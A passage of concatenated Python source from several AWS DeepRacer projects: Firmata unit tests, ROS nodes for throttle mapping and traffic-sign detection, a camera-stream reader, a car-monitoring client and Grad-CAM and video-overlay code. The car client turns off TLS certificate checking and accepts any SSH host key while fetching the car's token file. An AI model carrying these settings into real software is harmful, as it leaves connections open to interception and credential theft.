class UtilTests(unittest.TestCase):
def test_to_two_bytes(self):
for i in range(32768):
val = to_two_bytes(i)
self.assertEqual(len(val), 2)
self.assertEqual(to_two_bytes(32767), bytearray(b'\x7f\xff'))
self.assertRaises(ValueError, to_two_bytes, 32768)
def test_from_two_bytes(self):
for i in range(32766, 32768):
val = to_two_bytes(i)
ret = from_two_bytes(val)
self.assertEqual(ret, i)
self.assertEqual(from_two_bytes(('\xff', '\xff')), 32767)
self.assertEqual(from_two_bytes(('\x7f', '\xff')), 32767)
def test_two_byte_iter_to_str(self):
string, s = 'StandardFirmata', []
for i in string:
s.append(i)
s.append('\x00')
self.assertEqual(two_byte_iter_to_str(s), 'StandardFirmata')
def test_str_to_two_byte_iter(self):
string, itr = 'StandardFirmata', bytearray()
for i in string:
itr.append(ord(i))
itr.append(0)
self.assertEqual(itr, str_to_two_byte_iter(string))
def test_break_to_bytes(self):
self.assertEqual(break_to_bytes(200), (200,))
self.assertEqual(break_to_bytes(800), (200, 4))
self.assertEqual(break_to_bytes(802), (2, 2, 200))
if __name__ == '__main__':
unittest.main(verbosity=2)
``` |
{
"source": "jochem725/aws-deepracer-deep-driver",
"score": 3
} |
#### File: deepdriver_navigation_pkg/deepdriver_navigation_pkg/control_utils.py
```python
import math
from deepdriver_navigation_pkg import constants
def get_mapped_action(action_category, max_speed_pct):
"""Return the angle and throttle values to be published for servo.
Args:
action_category (int): Integer value corresponding to the action space category.
max_speed_pct (float): Float value ranging from 0.0 to 1.0 taken as input
from maximum speed input.
Returns:
angle (float): Angle value to be published to servo.
throttle (float): Throttle value to be published to servo.
"""
angle = constants.ACTION_SPACE[action_category][constants.ActionSpaceKeys.ANGLE]
categorized_throttle = constants.ACTION_SPACE[action_category][
constants.ActionSpaceKeys.THROTTLE
]
throttle = get_rescaled_manual_speed(categorized_throttle, max_speed_pct)
return angle, throttle
def get_rescaled_manual_speed(categorized_throttle, max_speed_pct):
"""Return the non linearly rescaled speed value based on the max_speed_pct.
Args:
categorized_throttle (float): Float value ranging from -1.0 to 1.0.
max_speed_pct (float): Float value ranging from 0.0 to 1.0 taken as input
from maximum speed input.
Returns:
float: Categorized value of the input speed.
"""
# return 0.0 if categorized_throttle or maximum speed pct is 0.0.
if categorized_throttle == 0.0 or max_speed_pct == 0.0:
return 0.0
# get the parameter value to calculate the coefficients a, b in the equation y=ax^2+bx
    # The lower the update_speed_scale_value parameter, the higher the impact on the
# final mapped_speed.
# Hence the update_speed_scale_value parameter is inversely associated with max_speed_pct
# and bounded by MANUAL_SPEED_SCALE_BOUNDS.
# Ex: max_speed_pct = 0.5; update_speed_scale_value = 3
# max_speed_pct = 1.0; update_speed_scale_value = 1
# Lower the update_speed_scale_value: categorized_throttle value gets mapped to
# higher possible values.
# Example: update_speed_scale_value = 1.0;
# categorized_throttle = 0.8 ==> mapped_speed = 0.992
# Higher the update_speed_scale_value: categorized_throttle value gets mapped to
# lower possible values.
# Example: update_speed_scale_value = 3.0;
# categorized_throttle = 0.8 ==> mapped_speed = 0.501
inverse_max_speed_pct = 1 - max_speed_pct
update_speed_scale_value = constants.MANUAL_SPEED_SCALE_BOUNDS[
0
] + inverse_max_speed_pct * (
constants.MANUAL_SPEED_SCALE_BOUNDS[1] - constants.MANUAL_SPEED_SCALE_BOUNDS[0]
)
speed_mapping_coefficients = dict()
# recreate the mapping coefficients for the non-linear equation ax^2 + bx based on
# the update_speed_scale_value.
    # These coefficients map the [update_speed_scale_value, update_speed_scale_value/2]
# values to DEFAULT_SPEED_SCALE values [1.0, 0.8].
speed_mapping_coefficients["a"] = (1.0 / update_speed_scale_value ** 2) * (
2.0 * constants.DEFAULT_SPEED_SCALES[0]
- 4.0 * constants.DEFAULT_SPEED_SCALES[1]
)
speed_mapping_coefficients["b"] = (1.0 / update_speed_scale_value) * (
4.0 * constants.DEFAULT_SPEED_SCALES[1] - constants.DEFAULT_SPEED_SCALES[0]
)
return math.copysign(1.0, categorized_throttle) * (
speed_mapping_coefficients["a"] * abs(categorized_throttle) ** 2
+ speed_mapping_coefficients["b"] * abs(categorized_throttle)
)
```
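The comment block in `get_rescaled_manual_speed` quotes two reference points (scale 1.0 -> 0.992 and scale 3.0 -> 0.501 for a categorized throttle of 0.8). The sketch below re-derives those numbers on its own; `DEFAULT_SPEED_SCALES = [1.0, 0.8]` is assumed from the comment, mirroring what `constants.py` is expected to define:
```python
# Re-derives the quadratic mapping y = a*x^2 + b*x described in the comments above.
DEFAULT_SPEED_SCALES = [1.0, 0.8]  # assumed; see constants.py for the real values

def mapped_speed(categorized_throttle, update_speed_scale_value):
    a = (1.0 / update_speed_scale_value ** 2) * (
        2.0 * DEFAULT_SPEED_SCALES[0] - 4.0 * DEFAULT_SPEED_SCALES[1]
    )
    b = (1.0 / update_speed_scale_value) * (
        4.0 * DEFAULT_SPEED_SCALES[1] - DEFAULT_SPEED_SCALES[0]
    )
    return a * categorized_throttle ** 2 + b * categorized_throttle

print(round(mapped_speed(0.8, 1.0), 3))  # 0.992 -> aggressive mapping at full max speed
print(round(mapped_speed(0.8, 3.0), 3))  # 0.501 -> gentler mapping at 50% max speed
```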
#### File: traffic_sign_pkg/traffic_sign_pkg/cv_utils.py
```python
import cv2
import numpy as np
def detect_traffic_light_color(image, bounding_box):
# Very naive classification:
# - First convert to HSV for easy color thresholding
# - Then threshold red, yellow and green hues.
# - On these masks: detect circles
# - Then select color which occurs most.
# Convert image to HSV for easy processing.
hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
# Mask for bounding box.
    # np.bool was removed in recent NumPy releases, so use the builtin bool instead.
    bb_mask = np.zeros((image.shape[0], image.shape[1]), dtype=bool)
    bb_mask[
        bounding_box[1] : bounding_box[3],
        bounding_box[0] : bounding_box[2],
    ] = True
# Color ranges (computed using http://www.speakingsame.com/hsv/index.php)
# Due to circular nature of hue channel, two masks needed for red.
red_mask = bb_mask & cv2.inRange(
hsv, np.array([0, 150, 100]), np.array([10, 255, 255])
)
green_mask = bb_mask & cv2.inRange(
hsv, np.array([40, 50, 50]), np.array([90, 255, 255])
)
yellow_mask = bb_mask & cv2.inRange(
hsv, np.array([15, 100, 100]), np.array([30, 255, 255])
)
colors = ["red", "yellow", "green"]
color = colors[
np.argmax([np.sum(red_mask), np.sum(yellow_mask), np.sum(green_mask)])
]
return color
```
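A minimal usage sketch for the helper above. The image file name and the (x_min, y_min, x_max, y_max) box are placeholders; in the node itself the box comes from an object-detection result:
```python
import cv2

from traffic_sign_pkg.cv_utils import detect_traffic_light_color

frame = cv2.imread("camera_frame.jpg")   # hypothetical BGR frame
traffic_light_box = (120, 40, 180, 160)  # (x_min, y_min, x_max, y_max), made up
print(detect_traffic_light_color(frame, traffic_light_box))  # "red", "yellow" or "green"
```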
#### File: traffic_sign_pkg/traffic_sign_pkg/traffic_sign_node.py
```python
import time
import signal
import threading
import numpy as np
import rclpy
from rclpy.node import Node
from rclpy.executors import MultiThreadedExecutor
from rclpy.qos import QoSProfile, QoSHistoryPolicy, QoSReliabilityPolicy
from cv_bridge import CvBridge
from sensor_msgs.msg import Image
from deepracer_interfaces_pkg.msg import (
InferResultsArray,
TrafficSign,
TrafficLight,
TrafficMsg,
)
from traffic_sign_pkg import constants, utils, cv_utils
class TrafficSignNode(Node):
def __init__(self, qos_profile):
"""Create a ObjectDetectionNode."""
super().__init__("traffic_sign_node")
self.get_logger().info("traffic_sign_node started.")
# Double buffer to hold the input inference data.
self.input_buffer = utils.DoubleBuffer(clear_data_on_get=True)
# Check if the inference output needs to be published to localhost using web_video_server
self.declare_parameter("PUBLISH_DISPLAY_OUTPUT")
self.publish_display_output = (
self.get_parameter("PUBLISH_DISPLAY_OUTPUT")
.get_parameter_value()
.bool_value
)
self.get_logger().info(f"Publish output set to {self.publish_display_output}")
# Create subscription to sensor messages from camera.
self.image_subscriber = self.create_subscription(
InferResultsArray,
constants.INFERENCE_RESULT_TOPIC,
self.on_inference_received_cb,
qos_profile,
)
# Creating publisher for display_image.
self.display_image_publisher = self.create_publisher(
Image, constants.DISPLAY_IMAGE_PUBLISHER_TOPIC, 10
)
# Publisher for detection results.
self.traffic_sign_publisher = self.create_publisher(
TrafficMsg, constants.TRAFFIC_SIGN_PUBLISHER_TOPIC, qos_profile
)
self.bridge = CvBridge()
# Launching a separate thread to run processing.
self.stop_thread = False
self.thread_initialized = False
self.thread = threading.Thread(target=self.run_detection)
self.thread.start()
self.thread_initialized = True
self.get_logger().info(
f"Waiting for input data on {constants.INFERENCE_RESULT_TOPIC}"
)
def wait_for_thread(self):
"""Function which joins the created background thread."""
if self.thread_initialized:
self.thread.join()
self.get_logger().info("Thread joined")
def thread_shutdown(self):
"""Function which sets the flag to shutdown background thread."""
self.stop_thread = True
def on_inference_received_cb(self, inference_data):
"""Call back for adding to the input double buffer whenever
new sensor image is received from sensor_fusion_node.
Args:
inference_data (InferResultsArray): Message containing inference results from object detection.
"""
self.input_buffer.put(inference_data)
def run_detection(self):
"""Method for running processing based on the received input data."""
try:
while not self.stop_thread:
# Get an input data from double buffer (InferResultsArray)
inference_results = self.input_buffer.get()
start_time = time.time()
# First get the input into a format we can work with.
image = self.bridge.imgmsg_to_cv2(inference_results.images[0])
results = inference_results.results # InferResults object
self.get_logger().info(
f"Got input data... Results: {len(inference_results.results)} Images: {len(inference_results.images)}"
)
# List of tuples (sign, value, approx_distance)
detected_signs = []
# List of tuples (color, approx_distance)
detected_traffic_lights = []
# Process each inference result object detected:
for res in results:
# First check detected label.
coco_label = constants.COCO_LABELS[res.class_label]
bounding_box = (
                        int(res.x_min),
                        int(res.y_min),
                        int(res.x_max),
                        int(res.y_max),
)
# TODO: Compute better approx distance metric.
max_bbox_size = image.shape[0] * image.shape[1]
bbox_size = (bounding_box[2] - bounding_box[0]) * (
bounding_box[3] - bounding_box[1]
)
# Smaller means closer.
distance_approximation = 1.0 - bbox_size / max_bbox_size
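                    # distance_approximation lies in [0, 1): close to 0 when the bounding
                    # box fills the frame (object very close), close to 1 for tiny boxes.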
self.get_logger().info(f"Postprocessing {coco_label}")
if coco_label == "traffic light":
color = cv_utils.detect_traffic_light_color(image, bounding_box)
self.get_logger().info(f"Traffic detected -> {color}")
detected_traffic_lights.append((color, distance_approximation))
elif coco_label == "street sign":
detected_signs.append(
("street sign", -1.0, distance_approximation)
)
elif coco_label == "stop sign":
detected_signs.append(
("stop sign", 0.0, distance_approximation)
)
else:
self.get_logger().info(f"No logic for label {coco_label}")
traffic_message = TrafficMsg()
traffic_message.signs = []
traffic_message.lights = []
for (sign, value, distance_approximation) in detected_signs:
msg = TrafficSign()
msg.type = sign
msg.value = value
msg.distance = distance_approximation
traffic_message.signs.append(msg)
for (color, distance_approximation) in detected_traffic_lights:
msg = TrafficLight()
msg.type = "traffic light"
msg.color = color
msg.distance = distance_approximation
traffic_message.lights.append(msg)
# Always publish the message regardless of the number of detected signs:
# no signs is also valid road information.
self.traffic_sign_publisher.publish(traffic_message)
# TODO: Output debug data on top of input image.
if self.publish_display_output:
self.get_logger().info("Publishing display output")
display_image = image
# Publish to display topic (Can be viewed on localhost:8080).
display_image = self.bridge.cv2_to_imgmsg(
np.array(display_image), "bgr8"
)
self.display_image_publisher.publish(display_image)
self.get_logger().info(
f"Total execution time = {time.time() - start_time}"
)
except Exception as ex:
self.get_logger().error(f"Failed detection step: {ex}")
# Destroy the ROS Node running in another thread as well.
self.destroy_node()
rclpy.shutdown()
def main(args=None):
rclpy.init(args=args)
qos = QoSProfile(
reliability=QoSReliabilityPolicy.RMW_QOS_POLICY_RELIABILITY_BEST_EFFORT,
depth=1,
history=QoSHistoryPolicy.RMW_QOS_POLICY_HISTORY_KEEP_LAST,
)
try:
traffic_sign_node = TrafficSignNode(qos)
executor = MultiThreadedExecutor()
def signal_handler(signum, frame):
"""Callback function to handle registered signal handler
to join and stop executing running thread created.
Args:
signum: The signal number
frame: the current stack frame (None or a frame object)
"""
traffic_sign_node.get_logger().info("Signal Handler initiated")
traffic_sign_node.thread_shutdown()
traffic_sign_node.wait_for_thread()
# Register SIGINT handler
signal.signal(signal.SIGINT, signal_handler)
rclpy.spin(traffic_sign_node, executor)
except Exception as ex:
traffic_sign_node.get_logger().error(f"Exception in Traffic Sign Node: {ex}")
traffic_sign_node.destroy_node()
rclpy.shutdown()
# Destroy the node explicitly
# (optional - otherwise it will be done automatically
# when the garbage collector destroys the node object)
traffic_sign_node.destroy_node()
rclpy.shutdown()
if __name__ == "__main__":
main()
``` |
{
"source": "jochem725/deepracer-camera-telemetry",
"score": 3
} |
#### File: dct/camera/stream.py
```python
import cv2
import numpy as np
import threading
import time
import queue
import uuid
import logging
from dct.util.silverstone import DeepRacerCar
class StreamConsumer:
def __init__(self):
self.queue = queue.Queue()
def notify(self, frame):
self.queue.put(frame)
def frame_iterator(self):
try:
while True:
# If no new frame in queue for 1 second, stop iterating.
frame = self.queue.get(timeout=1)
if frame is None:
return
yield frame
except queue.Empty:
return
class BaseStream:
"""Base class which serves as a blueprint for frame providing objects."""
def __init__(self):
self.identifier = uuid.uuid4()
self.consumers = []
logging.info("Creating source stream {}".format(self.identifier))
def publish_frame(self, frame):
for consumer in self.consumers:
consumer.notify(frame)
def subscribe(self, consumer: StreamConsumer):
self.consumers.append(consumer)
def unsubscribe(self, consumer: StreamConsumer):
if consumer in self.consumers:
self.consumers.remove(consumer)
@property
def fps(self):
raise NotImplementedError
@property
def width(self):
raise NotImplementedError
@property
def height(self):
raise NotImplementedError
class DeepRacerMJPEGStream(BaseStream):
def __init__(
self, car: DeepRacerCar, width=480, height=360, quality=90, min_fps=10.0
):
super().__init__()
self.car = car
self.videoThread = threading.Thread(target=self.process_frames)
self.videoThread.daemon = True
self.video_url = car.camera_feed(width=width, height=height, quality=quality)
self.video_width = width
self.video_height = height
if quality <= 0 or quality > 100:
raise ValueError("Video quality should be in range [1, 100]")
        self.quality = quality  # JPEG quality of the video stream; lower uses less data at the cost of lower video quality.
        self.min_fps = min_fps  # Minimum FPS required for broadcasting; if the approximate fps drops below this, the stream disconnects and retries.
self.framerate = None # Stores current framerate approximation.
def start(self):
self.videoThread.start()
logging.debug("Starting streaming thread for stream {}".format(self.identifier))
def process_frames(self):
while True:
try:
logging.info(
"Attempting to connect to stream {}".format(self.identifier)
)
if not self.car.connected:
logging.info(
"Car '{}' not connected for input stream {}".format(
self.car.name, self.identifier
)
)
continue
bytebuffer = bytes()
response = self.car.session.get(self.video_url, stream=True, timeout=6)
response.raise_for_status()
chunk_size = 10 * 1024 * 1024
start_frame = time.time()
framerate_counter = 0
for chunk in response.iter_content(chunk_size=chunk_size):
bytebuffer += chunk
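                    # 0xFFD8 is the JPEG start-of-image marker and 0xFFD9 the end-of-image
                    # marker; one complete frame sits between such a pair in the MJPEG byte stream.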
a = bytebuffer.find(b"\xff\xd8")
b = bytebuffer.find(b"\xff\xd9")
if a != -1 and b != -1:
framerate_counter += 1
frame_time = time.time()
jpg = bytebuffer[a : b + 2]
bytebuffer = bytebuffer[b + 2 :]
frame = cv2.imdecode(
                            np.frombuffer(jpg, dtype=np.uint8), cv2.IMREAD_COLOR
)
# Car will start "enqueing" frames if it cannot send them fast enough causing huge delays on the stream after a period of bad connection.
# Workaround: monitor framerate, if it drops try to reconnect.
if (frame_time - start_frame) > 1:
self.framerate = framerate_counter / (
frame_time - start_frame
)
framerate_counter = 0
start_frame = frame_time
logging.debug("FPS: {}".format(self.framerate))
# If no approximate framerate yet, don't broadcast the frames to prevent lag when low framerate occurs.
if self.framerate is None:
continue
elif self.framerate < self.min_fps:
logging.debug(
"Stopping because of low framerate: {}".format(
self.framerate
)
)
self.framerate = None
break
self.publish_frame(frame)
except Exception as e:
logging.debug(e)
pass
finally:
retry_rate = 5
logging.debug(
"Finish stream for {}, retry in {} seconds...".format(
self.identifier, retry_rate
)
)
# Notify no frame is sent.
self.publish_frame(None)
# On failure try to reconnect to stream every 5 seconds.
time.sleep(retry_rate)
@property
def width(self):
return self.video_width
@property
def height(self):
return self.video_height
```
#### File: dct/util/silverstone.py
```python
import requests
import tempfile
import shutil
import pysftp
import os
import threading
import time
import re
import logging
import paramiko
from urllib3.connection import ConnectTimeoutError
from dct.util.model import ModelMetadata, Model
class DeepRacerCar:
    def __init__(self, ip, ssh_password, name="Car", verbose=False):
        self.ip = ip
        self.ssh_password = ssh_password
self.base_url = "https://{}".format(ip)
self.name = name
self.carThread = threading.Thread(target=self.monitor)
self.carThread.daemon = True
self.logThread = threading.Thread(target=self.roslog)
self.logThread.daemon = True
self.tmpdir = tempfile.mkdtemp()
self.session = requests.Session()
self.session.verify = False
self.connected = False
self.model_name = None
self.throttle = None
self.car_driving = None
self.battery_level = None
self.camera_status = None
self.stereo_status = None
self.lidar_status = None
self.verbose = verbose
def __del__(self):
if os.path.exists(self.tmpdir):
shutil.rmtree(self.tmpdir)
def roslog(self):
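        # Tail the aggregated ROS log topic over SSH and parse each line for state
        # changes (driving state, loaded model, throttle) via _update_log_values.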
while True:
try:
with paramiko.SSHClient() as client:
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(
self.ip, 22, "deepracer", self.ssh_password, timeout=2
)
stdin, stdout, stderr = client.exec_command(
"source /opt/ros/kinetic/setup.bash; rostopic echo /rosout_agg/msg",
)
for line in iter(lambda: stdout.readline(2048), ""):
self._update_log_values(line)
except Exception as e:
print(e)
finally:
# Retry every 5 seconds.
time.sleep(5)
def monitor(self):
while True:
try:
if not self.connected:
self._connect()
# Update battery level
self._update_battery_level()
# Update sensor info
self._update_sensor_status()
if self.verbose:
print(self)
except Exception as e:
self.connected = False
print(e)
logging.info("Car '{}' disconnected".format(self.name))
finally:
# Update every 10 seconds.
time.sleep(10)
def __str__(self):
return "[{}]: Model: {} - Battery: {} - Driving: {} - Throttle: {}%".format(
self.name,
self.model,
self.battery_level,
self.car_driving,
self.throttle if self.throttle is not None else "?",
)
def connect(self):
self.carThread.start()
self.logThread.start()
def _connect(self):
try:
logging.info("Attempting to connect to {}".format(self.name))
deepracer_token_path = os.path.join(self.tmpdir, "token.txt")
# Use SSH to get the deepracer token from the cookie.
with pysftp.Connection(
self.ip, username="deepracer", password=self.ssh_password
) as sftp:
logging.info("Downloading token for {}".format(self.name))
sftp.get(
"/opt/aws/deepracer/token.txt",
deepracer_token_path,
)
with open(deepracer_token_path, "r") as f:
self.cookie = "deepracer_token={}".format(f.readlines()[0])
self.session.headers["Cookie"] = self.cookie
self.connected = True
logging.info("Car '{}' connected!".format(self.name))
except ConnectTimeoutError:
self.connected = False
logging.info("Timeout connecting to car '{}'".format(self.name))
return
except Exception as e:
logging.debug(e)
def load_model(self, model_name):
logging.info(
"Loading model '{}' from car '{}'' at {}".format(
model_name, self.name, self.ip
)
)
with pysftp.Connection(
self.ip, username="deepracer", password=self.ssh_password
) as sftp:
base_path = os.path.join(self.tmpdir, model_name)
if not os.path.exists(base_path):
os.makedirs(base_path)
model_path = os.path.join(self.tmpdir, model_name, "model.pb")
metadata_path = os.path.join(self.tmpdir, model_name, "model_metadata.json")
if not os.path.exists(model_path):
sftp.get(
"/opt/aws/deepracer/artifacts/{}/model.pb".format(model_name),
model_path,
)
if not os.path.exists(metadata_path):
sftp.get(
"/opt/aws/deepracer/artifacts/{}/model_metadata.json".format(
model_name
),
metadata_path,
)
metadata = ModelMetadata.from_file(metadata_path)
return Model.from_file(model_path, metadata), metadata
def camera_feed(self, width=480, height=360, quality=90, topic="display_mjpeg"):
assert topic in ["display_mjpeg", "overlay_msg"], "Camera topic not supported!"
return "{}/route?topic=/{}&width={}&height={}&quality={}".format(
self.base_url, topic, width, height, quality
)
def _update_battery_level(self):
res = self.session.get(
"{}/api/get_battery_level".format(self.base_url), timeout=20
)
if res.status_code != 200:
raise Exception("Error updating car battery level.")
out = res.json()
if out["success"] is True and self.battery_level != out["battery_level"]:
self.battery_level = out["battery_level"]
logging.info(
"{} battery level changed: {}".format(self.name, self.battery_level)
)
def _update_sensor_status(self):
res = self.session.get(
"{}/api/get_sensor_status".format(self.base_url), timeout=20
)
if res.status_code != 200:
raise Exception("Error updating car sensor status.")
out = res.json()
if out["success"] is True:
if self.camera_status != out["camera_status"]:
self.camera_status = out["camera_status"]
logging.info(
"Car '{}' camera_status changed: {}".format(
self.name, self.camera_status
)
)
if self.stereo_status != out["stereo_status"]:
self.stereo_status = out["stereo_status"]
logging.info(
"Car '{}' stereo_status changed: {}".format(
self.name, self.stereo_status
)
)
if self.lidar_status != out["lidar_status"]:
self.lidar_status = out["lidar_status"]
logging.info(
"Car '{}' lidar_status changed: {}".format(
self.name, self.lidar_status
)
)
def _update_log_values(self, line):
if line == "---\n":
return
line = line.lstrip('"').rstrip('"\n')
# Check if car is running
match = re.search(r"Inference task .* has (.*)", line)
if match:
state = match[1]
car_driving = True if state == "started" else False
if self.car_driving != car_driving:
self.car_driving = car_driving
logging.info(
"Car '{}' driving state changed: {}".format(
self.name, self.car_driving
)
)
return
# Find currently loaded model.
match = re.search(r"Model '(.*)' is installed", line)
if match:
if self.model_name != match[1]:
self.model_name = match[1]
logging.info(
"Car '{}' loaded model changed: {}".format(
self.name, self.model_name
)
)
return
# Find last throttle value.
match = re.search(r"Setting throttle to (\d+\.\d+)", line)
if match:
throttle = float(match[1]) * 100
if self.throttle != throttle:
self.throttle = throttle
logging.info(
"Car '{}' throttle changed: {}".format(self.name, self.throttle)
)
return
```
#### File: dct/visualizations/gradcam.py
```python
import tensorflow as tf
import numpy as np
import cv2
import threading
import time
from dct.util.model import Model
class GradCamOverlay:
def __init__(self, car):
self.car = car
self.gradcamThread = threading.Thread(target=self.monitor_model)
self.gradcamThread.daemon = True
self.active_model_name = None
self.model = None
self.metadata = None
self.cam = None
self.gradcamThread.start()
def placeholder(self, input_frame):
return input_frame
def frame(self, input_frame):
if self.cam is None:
return input_frame
result, frame = self.cam.process(input_frame)
return frame
def monitor_model(self):
while True:
if self.active_model_name != self.car.model_name:
self.cam = None
self.model, self.metadata = self.car.load_model(self.car.model_name)
self.cam = GradCam(self.model)
self.active_model_name = self.car.model_name
time.sleep(0.1)
class GradCam:
def __init__(self, model: Model):
self.model = model
# Extract gradcam logic from model.
self.input_layer = self.model.get_model_input()
self.output_layer = self.model.get_model_output()
self.conv_output = self.model.get_model_convolutional_output()
# Get output for this action
y_c = tf.reduce_sum(
tf.multiply(
self.output_layer,
tf.one_hot(
[tf.argmax(self.output_layer)], self.output_layer.shape[-1]
), # TODO: Argmax selects target action for PPO, also allow manual action idx to be specified.
),
axis=1,
)
# Compute gradients based on last cnn layer
self.target_grads = tf.gradients(y_c, self.conv_output)[0]
def process(self, input):
input_resized = cv2.resize(input, self.model.input_size())
input_preprocessed = cv2.cvtColor(input_resized, cv2.COLOR_BGR2GRAY)
input_frame = np.expand_dims(input_preprocessed, axis=2)
ops = [self.output_layer, self.conv_output, self.target_grads]
feed_dict = {self.input_layer: [input_frame]}
result, out, grads_value = self.model.session.run(ops, feed_dict=feed_dict)
result, out, grads_value = result[0, :], out[0, :], grads_value[0, :, :, :]
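        # Standard Grad-CAM: the channel weights are the spatially averaged gradients,
        # and the class activation map is the weighted sum over the convolutional feature maps.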
weights = np.mean(grads_value, axis=(0, 1))
cam = np.dot(out, weights)
# ReLU (only positive values are of interest)
cam = np.maximum(0, cam)
cam = cam / np.max(cam)
# Scale back to resized input frame dimensions.
input_h, input_w = input_resized.shape[:2]
cam = cv2.resize(cam, (input_w, input_h))
# Blend
cam = cv2.applyColorMap(np.uint8(255 * cam), cv2.COLORMAP_JET)
cam = np.float32(cam) + np.float32(input_resized)
cam = 255 * cam / np.max(cam)
cam = np.uint8(cam)
cam = cv2.cvtColor(cam, cv2.COLOR_BGR2RGB)
# Scale back to original frame dimensions.
input_h, input_w = input.shape[:2]
cam = cv2.resize(cam, (input_w, input_h))
return result, cam
``` |
{
"source": "jochem725/deepracer-simapp",
"score": 3
} |
#### File: dist-packages/mp4_saving/single_agent_image_editing.py
```python
import datetime
import logging
import rospy
import cv2
from sensor_msgs.msg import Image as ROSImg
from markov.log_handler.logger import Logger
from markov.rospy_wrappers import ServiceProxyWrapper
from deepracer_simulation_environment.srv import VideoMetricsSrvRequest, VideoMetricsSrv
from mp4_saving import utils
from mp4_saving.constants import (RaceCarColorToRGB,
IconographicImageSize,
TrackAssetsIconographicPngs, RACE_COMPLETE_Y_OFFSET,
RACE_TYPE_TO_VIDEO_TEXT_MAPPING, XYPixelLoc, AWS_DEEPRACER_WATER_MARK)
from mp4_saving.image_editing_interface import ImageEditingInterface
from mp4_saving.top_view_graphics import TopViewGraphics
LOG = Logger(__name__, logging.INFO).get_logger()
class SingleAgentImageEditing(ImageEditingInterface):
""" Image editing class for head to bot, time-trail, obstacle where
there is only single agent
"""
def __init__(self, racecar_info, race_type):
""" Initializing the required data for the head to bot, time-trail. This is used for single agent
Arguments:
racecars_info (list): list of dict having information of the agent
race_type (str): Since this class is reused for all the different race_type
"""
self.racecar_info = racecar_info
self.race_type = race_type
# Store the font which we will use to write the phase with
self.amazon_ember_regular_20px = utils.get_font('AmazonEmber-Regular', 20)
self.amazon_ember_regular_16px = utils.get_font('AmazonEmber-Regular', 16)
self.amazon_ember_heavy_30px = utils.get_font('AmazonEmber-Heavy', 30)
self.amazon_ember_light_18px = utils.get_font('AmazonEmber-Light', 18)
self.amazon_ember_light_20px = utils.get_font('AmazonEmber-Light', 20)
self.amazon_ember_light_italic_20px = utils.get_font('AmazonEmber-LightItalic', 20)
self.is_racing = rospy.get_param("VIDEO_JOB_TYPE", "") == "RACING"
self.is_league_leaderboard = rospy.get_param("LEADERBOARD_TYPE", "") == "LEAGUE"
self.leaderboard_name = rospy.get_param("LEADERBOARD_NAME", "")
# The track image as iconography
self.track_icongraphy_img = utils.get_track_iconography_image()
gradient_img_path = TrackAssetsIconographicPngs.OBSTACLE_OVERLAY_PNG_LEAGUE_LEADERBOARD.value \
if self.is_league_leaderboard else TrackAssetsIconographicPngs.OBSTACLE_OVERLAY_PNG.value
self.gradient_img = utils.get_image(gradient_img_path,
IconographicImageSize.FULL_IMAGE_SIZE.value)
self.gradient_alpha = self.gradient_img[:, :, 3] / 255.0
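        # The 4th channel of the overlay PNG is its alpha mask, normalized to [0, 1];
        # presumably used as the per-pixel blend weight by utils.apply_gradient.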
# Subscribing to the agent metrics
rospy.wait_for_service("/agent/mp4_video_metrics")
self.mp4_video_metrics_srv = ServiceProxyWrapper("/agent/mp4_video_metrics", VideoMetricsSrv)
# Top camera information
top_camera_info = utils.get_top_camera_info()
self.edited_topview_pub = rospy.Publisher('/deepracer/topview_stream', ROSImg, queue_size=1)
self.top_view_graphics = TopViewGraphics(top_camera_info.horizontal_fov, top_camera_info.padding_pct,
top_camera_info.image_width, top_camera_info.image_height,
racecar_info)
def _edit_major_cv_image(self, major_cv_image):
""" Apply all the editing for the Major 45degree camera image
Args:
major_cv_image (Image): Image straight from the camera
Returns:
Image: Edited main camera image
"""
# Applying gradient to whole major image and then writing text
major_cv_image = utils.apply_gradient(major_cv_image, self.gradient_img, self.gradient_alpha)
mp4_video_metrics_info = self.mp4_video_metrics_srv(VideoMetricsSrvRequest())
# Top left location of the picture
loc_x, loc_y = XYPixelLoc.SINGLE_AGENT_DISPLAY_NAME_LOC.value
# Display name (Racer name/Model name)
display_name = self.racecar_info['display_name']
display_name_txt = display_name if len(display_name) < 15 else "{}...".format(display_name[:15])
major_cv_image = utils.write_text_on_image(image=major_cv_image, text=display_name_txt,
loc=(loc_x, loc_y), font=self.amazon_ember_regular_20px,
font_color=RaceCarColorToRGB.White.value,
font_shadow_color=RaceCarColorToRGB.Black.value)
# Lap Counter
loc_y += 30
total_laps = rospy.get_param("NUMBER_OF_TRIALS", 0)
current_lap = int(mp4_video_metrics_info.lap_counter) + 1
lap_counter_text = "{}/{}".format(current_lap, total_laps)
major_cv_image = utils.write_text_on_image(image=major_cv_image, text=lap_counter_text,
loc=(loc_x, loc_y), font=self.amazon_ember_heavy_30px,
font_color=RaceCarColorToRGB.White.value,
font_shadow_color=RaceCarColorToRGB.Black.value)
# total_evaluation_time (Race time)
loc_y += 45
total_eval_milli_seconds = mp4_video_metrics_info.total_evaluation_time
time_delta = datetime.timedelta(milliseconds=total_eval_milli_seconds)
total_eval_time_text = "Race | {}".format(utils.milliseconds_to_timeformat(time_delta))
major_cv_image = utils.write_text_on_image(image=major_cv_image, text=total_eval_time_text,
loc=(loc_x, loc_y), font=self.amazon_ember_light_18px,
font_color=RaceCarColorToRGB.White.value,
font_shadow_color=RaceCarColorToRGB.Black.value)
# Reset counter
loc_y += 25
reset_counter_text = "Reset | {}".format(mp4_video_metrics_info.reset_counter)
major_cv_image = utils.write_text_on_image(image=major_cv_image, text=reset_counter_text,
loc=(loc_x, loc_y), font=self.amazon_ember_light_18px,
font_color=RaceCarColorToRGB.White.value,
font_shadow_color=RaceCarColorToRGB.Black.value)
# Speed
loc_x, loc_y = XYPixelLoc.SPEED_EVAL_LOC.value
if self.is_league_leaderboard:
loc_x, loc_y = XYPixelLoc.SPEED_LEADERBOARD_LOC.value
speed_text = "{} m/s".format(utils.get_speed_formatted_str(mp4_video_metrics_info.throttle))
major_cv_image = utils.write_text_on_image(image=major_cv_image, text=speed_text,
loc=(loc_x, loc_y), font=self.amazon_ember_light_20px,
font_color=RaceCarColorToRGB.White.value,
font_shadow_color=RaceCarColorToRGB.Black.value)
# Leaderboard name
if self.is_league_leaderboard:
loc_x, loc_y = XYPixelLoc.LEADERBOARD_NAME_LOC.value
major_cv_image = utils.write_text_on_image(image=major_cv_image, text=self.leaderboard_name,
loc=(loc_x, loc_y), font=self.amazon_ember_regular_16px,
font_color=RaceCarColorToRGB.White.value,
font_shadow_color=RaceCarColorToRGB.Black.value)
# Evaluation type
